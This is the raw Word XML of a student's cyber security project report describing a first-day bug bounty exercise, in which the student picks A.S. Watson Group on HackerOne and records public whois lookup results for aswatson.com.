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0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito Bold" w:eastAsia="Carlito Bold" w:hAnsi="Carlito Bold" w:cs="Carlito Bold"/>
          <w:b w:val="true"/>
          <w:i w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Documentation on cyber security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bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>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Report on project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By Mohamad iliyas.i</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REG no:210181601025</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SBID:SB20230645082</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B.S.Abdur Rahman Crescent University</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito Regular" w:eastAsia="Carlito Regular" w:hAnsi="Carlito Regular" w:cs="Carlito Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito Regular" w:eastAsia="Carlito Regular" w:hAnsi="Carlito Regular" w:cs="Carlito Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Formerly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito Regular" w:eastAsia="Carlito Regular" w:hAnsi="Carlito Regular" w:cs="Carlito Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito Regular" w:eastAsia="Carlito Regular" w:hAnsi="Carlito Regular" w:cs="Carlito Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> Crescent Engineering College</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito Regular" w:eastAsia="Carlito Regular" w:hAnsi="Carlito Regular" w:cs="Carlito Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito Regular" w:eastAsia="Carlito Regular" w:hAnsi="Carlito Regular" w:cs="Carlito Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito Regular" w:eastAsia="Carlito Regular" w:hAnsi="Carlito Regular" w:cs="Carlito Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">                                 Day 1</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BUG BOUNTY Program</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Task -1</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Step -1</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Hackerone.com</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Step -2</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Domain name exploring</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Step -3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="264" w:after="0"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif Regular" w:eastAsia="Liberation Serif Regular" w:hAnsi="Liberation Serif Regular" w:cs="Liberation Serif Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="52"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">I choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>A.S. Watson Group</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="0" w:name="_Toctu5o92b931sn"/>
      <w:bookmarkEnd w:id="0"/>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Step -4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Osint framework in another tab</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Step -5</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Domain name whois records -whois</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Step -6</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Whois redirects to new tab</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Step -7</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Paste the domain name</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Step -8</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I got some information of that site</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Domain name:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Regular" w:eastAsia="Segoe UI Regular" w:hAnsi="Segoe UI Regular" w:cs="Segoe UI Regular"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>A.S. Watson Group(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Regular" w:eastAsia="Segoe UI Regular" w:hAnsi="Segoe UI Regular" w:cs="Segoe UI Regular"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://www.aswatson.com/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Regular" w:eastAsia="Segoe UI Regular" w:hAnsi="Segoe UI Regular" w:cs="Segoe UI Regular"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>https://www.aswatson.com</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Regular" w:eastAsia="Segoe UI Regular" w:hAnsi="Segoe UI Regular" w:cs="Segoe UI Regular"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Regular" w:eastAsia="Segoe UI Regular" w:hAnsi="Segoe UI Regular" w:cs="Segoe UI Regular"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="222222"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">aswatson.com is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Bold" w:eastAsia="Arimo Bold" w:hAnsi="Arimo Bold" w:cs="Arimo Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="D61400"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>unavailable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pBdr/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="264" w:after="0"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:b w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Other matching domains that are available</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="1" w:name="_Tocjs2mqgw7v5ek"/>
      <w:bookmarkEnd w:id="1"/>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aswatson.io</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aswatson.online</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aswatson.store</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aswatson.space</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aswatson.co</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aswatson.xyz</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aswatson.pw</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aswatson.co.in</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aswatson.in.net</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buyaswatson.com</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aswatson.site</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asdearwatson.com</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aswatson.website</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buyaswatson.online</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allaswatson.com</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aswatsongroup.online</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buyaswatsongroup.com</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 xml:space="preserve"> </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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="288" w:after="0"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="45"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>aswatson.com</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="2" w:name="_Tocyeh4vsgvmjhu"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="434343"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Updated 1 day ago</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="F0F0F0" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="264" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Bold" w:eastAsia="Arimo Bold" w:hAnsi="Arimo Bold" w:cs="Arimo Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="434343"/>
          <w:sz w:val="29"/>
          <w:shd w:fill="F0F0F0" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Domain Information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Domain:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>aswatson.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Registrar:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>CSC Corporate Domains, Inc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Registered On:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>2002-03-23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Expires On:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>2024-03-23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Updated On:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>2022-11-15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>clientTransferProhibited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Name Servers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>a1-124.akam.net</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> a12-67.akam.net</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> a13-67.akam.net</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> a2-65.akam.net</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> a20-64.akam.net</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
          <w:shd w:fill="FDFDFD" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> a5-67.akam.net</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shd w:fill="F0F0F0" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Bold" w:eastAsia="Arimo Bold" w:hAnsi="Arimo Bold" w:cs="Arimo Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="434343"/>
          <w:sz w:val="29"/>
          <w:shd w:fill="F0F0F0" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Registrant Contact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Name:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Domain Administrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Organization:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>A.S. Watson TM Limited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Street:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="303030"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Vistra Corporate Services Centre, Wickhams Cay II, Road Town</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arimo Regular" w:eastAsia="Arimo Regular" w:hAnsi="Arimo Regular" w:cs="Arimo Regular"/>
          <w:color w:val="757575"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>City:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="336" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
